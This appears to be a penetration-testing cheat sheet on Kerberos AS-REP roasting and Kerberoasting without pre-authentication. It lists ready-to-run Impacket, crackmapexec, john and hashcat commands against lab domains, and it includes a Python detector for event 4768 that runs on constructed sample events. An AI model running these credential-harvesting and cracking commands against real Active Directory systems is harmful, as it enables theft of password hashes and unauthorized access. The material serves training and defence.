Kerberos attack using username only. No credential is required.
ASREProast
AS-REP roasting is a technique that allows retrieving password hashes for users that have the "Do not require Kerberos preauthentication" property selected.
Linux
# Get ASREProastable credentials
GetNPUsers.py rebound.htb/ -usersfile users-rebound.htb.txt -format john
GetNPUsers.py oscp.lab/ -usersfile usernames.txt -format hashcat
GetNPUsers.py brute.com/ -usersfile users-brute.com.txt -dc-ip 172.31.3.3 -format john
GetNPUsers.py blackfield.local/ -usersfile users-blackfield.local.txt -dc-ip $RHOST -format john -outputfile ./hash-ASREP.txt

# users list dynamically queried with an LDAP anonymous bind
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'

# With crackmapexec
crackmapexec ldap rebound.htb -u users.txt -p '' --asreproast hash-ASREP.txt

# Crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash-ASREP.txt
hashcat -m 18200 -a 0 hash-ASREP.txt /usr/share/wordlists/rockyou.txt --show

# With userlist
sudo GetNPUsers.py iptracej.local/ -dc-ip 10.10.10.161 -usersfile usernames.txt

# With a single username
GetNPUsers.py absolute.htb/d.klay -dc-ip 10.129.192.41 -no-pass -format hashcat
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
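Defensive counterpart to the above, as an added example that is not part of these notes: on the domain controller, each GetNPUsers.py request shows up as a Security event 4768 with Pre-Authentication Type 0 and an RC4 (0x17) ticket, and a -usersfile sweep produces many such events from one client address. The records below are constructed sample events with the 4768 field names; the threshold value is an assumption.

```python
"""Flag AS-REP roasting in Windows Security event 4768 (Kerberos TGT requested).

Added example, not part of the original notes. SAMPLE_EVENTS are constructed.
Field names follow event 4768: PreAuthType 0 means the TGT was issued without
pre-authentication, TicketEncryptionType 0x17 is RC4-HMAC (the etype-23 hash
that hashcat mode 18200 cracks), 0x12 is AES256.
"""
from collections import defaultdict

SAMPLE_EVENTS = [  # constructed
    {"TargetUserName": "j.doe", "IpAddress": "10.0.0.5", "PreAuthType": 2, "TicketEncryptionType": 0x12},
    {"TargetUserName": "svc_backup", "IpAddress": "10.0.0.99", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "d.klay", "IpAddress": "10.0.0.99", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"TargetUserName": "a.smith", "IpAddress": "10.0.0.99", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    # A no-preauth account that only gets AES tickets yields no crackable RC4 blob.
    {"TargetUserName": "legacy_app", "IpAddress": "10.0.0.7", "PreAuthType": 0, "TicketEncryptionType": 0x12},
]


def is_asrep_roast_candidate(ev):
    """TGT issued with no pre-auth and RC4 encryption: the blob GetNPUsers.py collects."""
    return ev["PreAuthType"] == 0 and ev["TicketEncryptionType"] == 0x17


def flagged_accounts(events):
    """Accounts whose AS-REP was roastable; these should lose DONT_REQ_PREAUTH or move to AES."""
    return sorted({ev["TargetUserName"] for ev in events if is_asrep_roast_candidate(ev)})


def enumerating_sources(events, threshold=3):
    """Client addresses requesting roastable TGTs for >= threshold distinct accounts.

    One host sweeping a username list is the -usersfile pattern; threshold is an assumption.
    """
    seen = defaultdict(set)
    for ev in events:
        if is_asrep_roast_candidate(ev):
            seen[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(users) for ip, users in seen.items() if len(users) >= threshold}


if __name__ == "__main__":
    print("roastable accounts:", flagged_accounts(SAMPLE_EVENTS))
    print("sweeping clients:", enumerating_sources(SAMPLE_EVENTS))
```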
Kerberoast w/o pre-authentication
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one or more service accounts to target, a Kerberoast attack can be attempted without controlling any Active Directory account, since pre-authentication won't be required.
Linux
# ThePorgs version should be used
#
# pipenv shell
# git clone https://github.com/ThePorgs/impacket
# cd impacket/
# pip3 install .
GetUserSPNs.py rebound.htb/ -no-preauth jjones -usersfile users.txt -target-domain rebound.htb -dc-ip $RHOST